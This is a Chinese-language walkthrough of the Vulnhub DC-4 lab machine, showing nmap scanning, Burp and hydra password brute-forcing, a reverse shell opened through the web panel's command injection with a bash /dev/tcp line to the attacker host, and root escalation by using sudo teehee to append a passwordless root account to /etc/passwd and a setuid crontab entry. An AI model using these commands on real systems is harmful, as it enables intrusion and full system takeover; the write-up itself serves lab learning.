Vulnhub靶机:DC-4(sudo配置错误提权)

admin 2022年6月8日06:50:57评论41 views字数 1515阅读5分3秒阅读模式

工具:burp

目标机:192.168.119.148

攻击机(kali):192.168.119.140


nmap扫描C段确认目标目标ip,发现目标开放80端口和22端口:

nmap -sV -p- 192.168.119.0/24

Vulnhub靶机:DC-4(sudo配置错误提权)

访问192.168.119.148:80,发现是一个登录窗口并且用户名为admin:

Vulnhub靶机:DC-4(sudo配置错误提权)

用burp抓包,尝试爆破口令同时用sqlmap检测登录窗口是否存在sql注入。

虽然登录窗口无sql注入,但burp传来捷报:成功爆破admin密码--happy:

Vulnhub靶机:DC-4(sudo配置错误提权)

(PS:该网站输入正确密码后,还需要再submit一次即可进入后台)

Vulnhub靶机:DC-4(sudo配置错误提权)

该后台存在执行系统命令功能:

Vulnhub靶机:DC-4(sudo配置错误提权)

用burp抓包,检测是否存在系统命令任意执行漏洞。通过测试,该后台存在系统命令任意执行漏洞但存在权限不足:

Vulnhub靶机:DC-4(sudo配置错误提权)

Vulnhub靶机:DC-4(sudo配置错误提权)

既然可以执行任意命令,尝试反弹shell:

在kali上设置监听:

nc -lvp 7777
bash -c "bash -i >%26 /dev/tcp/192.168.119.140/7777 0>%261"

Vulnhub靶机:DC-4(sudo配置错误提权)

反弹shell成功,查看有SUID权限文件:

find / -perm -u=s -type f 2>/dev/null

Vulnhub靶机:DC-4(sudo配置错误提权)

发现test.sh文件,查看文件详细信息与文件内容,发现该文件为jim权限:

Vulnhub靶机:DC-4(sudo配置错误提权)

Vulnhub靶机:DC-4(sudo配置错误提权)

尝试在该文件内写入代码,生成jim权限下的shell文件(/bin/sh)。但是更改test.sh后,该文件不具有suid权限,尝试失败。

Vulnhub靶机:DC-4(sudo配置错误提权)

另寻他法,查看目录下其余的文件。mbox无权限访问,backups中发现密码备份文件old-password.bak:

Vulnhub靶机:DC-4(sudo配置错误提权)

Vulnhub靶机:DC-4(sudo配置错误提权)

查看系统用户信息,确认除root外还存在3个用户,jim,charles,sam:

cat /etc/passwd

Vulnhub靶机:DC-4(sudo配置错误提权)

有了密码,靶机开放ssh服务,故想到用ssh登录。将old-password中密码保存在passwd.txt中,然后用hydra尝试爆破用户密码。成功爆破出jim密码:jibril04:

hydra -L users.txt -P passwd.txt -t 6 ssh://192.168.119.148

Vulnhub靶机:DC-4(sudo配置错误提权)

登录jim后,查看mbox中邮件内容,并没有发现有价值的信息:

Vulnhub靶机:DC-4(sudo配置错误提权)

查看sudo权限,无sudo权限:

Vulnhub靶机:DC-4(sudo配置错误提权)

试着翻阅系统邮件。发现名为jim的邮件,打开得到charles密密码^xHhA&hvim0y:

mail

Vulnhub靶机:DC-4(sudo配置错误提权)

切换用户至charles,并查看权限,发现该用户有teehee权限:

Vulnhub靶机:DC-4(sudo配置错误提权)

查看teehee使用方式,其中-a参数对任意文件在不覆盖原文件的情况下,添加内容:

teehee --help

Vulnhub靶机:DC-4(sudo配置错误提权)

因为能对任意文件操作,所以在/etc/passwd中添加一个管理员账号取得root权限,这里设置的是无密码的test账号:

sudo teehee -a /etc/passwdtest::0:0:::/bin/shctrl+c

Vulnhub靶机:DC-4(sudo配置错误提权)

转到test账户,寻找flag文件:

find ./ -name *flag.txt

Vulnhub靶机:DC-4(sudo配置错误提权)

因为能添加任意文件内容,也可以在/etc/crontab中添加定时任务来提权。将时间全设置为*使其每分钟执行一次;其次将/bin/sh设置权限为4777,使其任意用户可执行且为suid权限(4为文件特殊权限suid的权值)。运行/bin/sh即可拥有root权限:

sudo teehee -a /etc/crontab* * * * * root chmod 4777 /bin/shctrl+c

Vulnhub靶机:DC-4(sudo配置错误提权)

渗透结束,完成任务。

本次渗透的关键点,本人认为是联想。出题人给出一封邮件且该邮件中无有价值信息,那就应该联想到:给出的提示是否是邮件本身,从而联想到其他邮件。

原文始发于微信公众号(陆吾安全攻防实验室):Vulnhub靶机:DC-4(sudo配置错误提权)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月8日06:50:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机:DC-4(sudo配置错误提权)http://cn-sec.com/archives/1067383.html

发表评论

匿名网友 填写信息